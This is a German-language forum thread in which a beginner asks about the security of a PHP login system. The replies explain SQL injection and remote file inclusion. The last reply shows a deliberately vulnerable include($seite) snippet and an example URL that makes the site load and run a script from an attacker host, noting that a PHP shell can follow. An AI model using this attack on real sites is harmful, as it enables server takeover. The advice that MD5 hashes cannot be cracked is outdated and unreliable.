Hi,

Ich habe mit hilfe von PHP ein Login system erstellt das seine Daten in PHP dateien als Variablen speichert. Das system Funktioniert fehlerfrei ich würde jetzt gerne wissen wie es mit der sicherheit des ganzen aussieht. Man kann ja wenn man den genauen Pfad kennt auf die Speicherdateien zureifen aber man sieht ja eigentlich nicht weil der PHP Code in den Dateien nichts ausgibt sondern Variablen entält. Mir geht es jetzt darum ob man trotzdem auf diese weise die User daten herausfinden kann (ausser man häckt sich in den Server).

mfg Prophet05

Eigentlich nicht, da der PHP-Code Serverseitig bearbeitet wird und nicht an die User gesendet wird.

Du kannst die Sicherheit auf jeden Fall erhöhen indem Du nicht die wirklichen Zugangsdaten, sondern z. B. nur die MD5-Hashes davon. Selbst wenn jemand die Passwortliste in die Hände bekommt hat er keine Möglichkeit ein Passwort daraus abzuleiten. Hier bliebe nur die Brute Force Methode und mit der kann es je nach Sicherheitsgrad des Passwortes viele, viele Jahre dauern so ein Passwort zu knacken (Entscheidend ist Länge, Zeichenwahl, etc.).

Hi,

Also gilt grundsätzlich solange man den server nicht knackt kann auch keiner auf die daten/variablen zugreifen?Und solange ist auch die sicherheit gewährleistet

mfg Prophet

Vom Prinzip her Ja, aber man kann natürlich Passwörter (was ich auch immer mache) verschlüsseln, damit wirklich keiner Zigriff erlangen kann.

Zitat von Prophet05

Also gilt grundsätzlich solange man den server nicht knackt kann auch keiner auf die daten/variablen zugreifen?Und solange ist auch die sicherheit gewährleistet

Nun, man muss den Server nicht unbedingt knacken. Ein nicht gut durchdachtes Script ermöglicht bereits Manipulation durch fremdem Quelltext (XSS) (fehlerhafte Includes, SQL-Injection, etc)

Aber der normale Surfer bekommt auf seinen Browser eh nur reine HTML-Daten und nicht die »Daten/Variablen«

Hi,

und wie macht man das? wenn dann würde ich das ganze gerne mit php realisieren. ich bräuchte dann einen ver und entschlüsselungs allgorhytmus. außerdem fällt mir ein das bringt wenn man server zugriff hat auch nichts mehr oder?

mfg Prophet05

Naja, wie kann man im iNet schon von Sicherheit Sprechen?

Hi,

Naja, wie kann man im iNet schon von Sicherheit Sprechen?

da hast du natürlich recht aber man sollte doch zumindest versuchen ein bisschen ordnung ins chaos zu bringen oder

nochmal zur frage aus meiner letzten nachricht:

und wie macht man das? wenn dann würde ich das ganze gerne mit php realisieren. ich bräuchte dann einen ver und entschlüsselungs allgorhytmus. außerdem fällt mir ein das bringt wenn man server zugriff hat auch nichts mehr oder?

mfg Prophet05

Gegen fehlerhafte Includes hilft eine Fallunterscheidung statt eines simplen include($_GET['page'].'.inc.php'), gegen SQL-Injections hilft mysql_escape_string().

Hi,

tut mir leid ich bin noch nicht sehr weit in PHP kannst du mir das noch einaml erklären.

mfg Prophet05

Der Punkt ist, dass man zur Sicherheit der Daten auf einem Server (Web- oder MySQL-Server) niemals einem Benutzer trauen sollte. Man sollte immer davon ausgehen, dass der Benutzer einem etwas Böses will. Demnach sind insbesondere Benutzereingaben – sei es in einem Formular oder als Anfrage eines URL – mit besonderer Vorsicht zu behandeln.

Im Bezug auf eine SQL-Datenbank kann es beispielsweise zu so genannten SQL-Injektionen kommen. Um sich vor solchen SQL-Injektionen zu schützen, bietet PHP beispielsweise die mysql_real_escape_string()-Funktion an, die entsprechende Zeichen für MySQL maskiert und somit unschädlich macht.

Ein weiteres Sicherheitsrisiko sind URLs. Viele greifen auf URL-Parametern zurück, um entsprechende Inhalte in eine Webseite einzubinden. Jedoch wird dort häufig nicht an Sicherheit gedacht. So kann es dazu kommen, dass – ähnlich wie bei den SQL-Injektionen – nicht vorhergesehene URLs angefragt werden, die von Laufzeitüberschreitungen (beispielsweise durch Angabe des aufgerufenen Dokuments) bis hin zu schwereren Fällen führen können, bei denen fremde Scripte aufgerufen und verarbeitet werden. Demnach sollten auch dort die Benutzereingaben unbedingt überprüft werden.

Hi,

da ich keine datenbank benutzte wir das mit der sql injektion wohl kaum pssieren. ich kann mir zwar vorstellen das jemand bei der eingabe einen link eingibt aber welchen nutzten er daon hat verstehe ich nicht. in meinem phph script wird an keiner einzigen stelle irgendeine möglichkeit geliefert diesesn auszuführen oder habe ich dich da fasch verstanden?

mfg Prophet05

Hi,

Da ist doch bestimmt auch ein Passwort mit drin dan sollte es doch keine Probleme geben weil er das nicht kennt.

Hier nochmal meine Letzte Nachricht:

da ich keine datenbank benutzte wir das mit der sql injektion wohl kaum pssieren. ich kann mir zwar vorstellen das jemand bei der eingabe einen link eingibt aber welchen nutzten er daon hat verstehe ich nicht. in meinem phph script wird an keiner einzigen stelle irgendeine möglichkeit geliefert diesesn auszuführen oder habe ich dich da fasch verstanden?

mfg Prophet50

Das Include-Problem:
Alle Daten die ein Besucher eingeben kann - MÜSSEN - erst einmal als -nicht vertrauenswürdig- eingestuft werden. Dazu zählen POST-, GET- und COOKIE-Daten.

Ein Beispiel (die Daten kommen per GET - z. B. http://www.neseite.de/index.php?seite=impressum.php ):

PHP-Code:

<?php
//mein doofer seitenincluder
include($seite);
?>

Wenn jetzt PHP nicht im Safe Modus läuft und die Funktion nicht deaktivert wurde, kann eine Include auch von einem entfernten Server kommen. Dies passiert dann über die Browseradressleiste indem man z. B. folgendes eingibt:
http://www.neseite.de/index.php?seite=http://hackerseite.br/boesesscript.php

Das Include ruft nun den fremden Quellcode auf, liest ihn ein und führt ihn aus. Und schon kann man viele nette sachen mit dem Webspace und/oder Server anstellen (eine kleine "phpshell" kann sehr fies werden).

Ähnliches ist auch über Formulare möglich. Es gibt viele Ansatzpunkte über die sich ein Entwickler Gedanken machen sollte.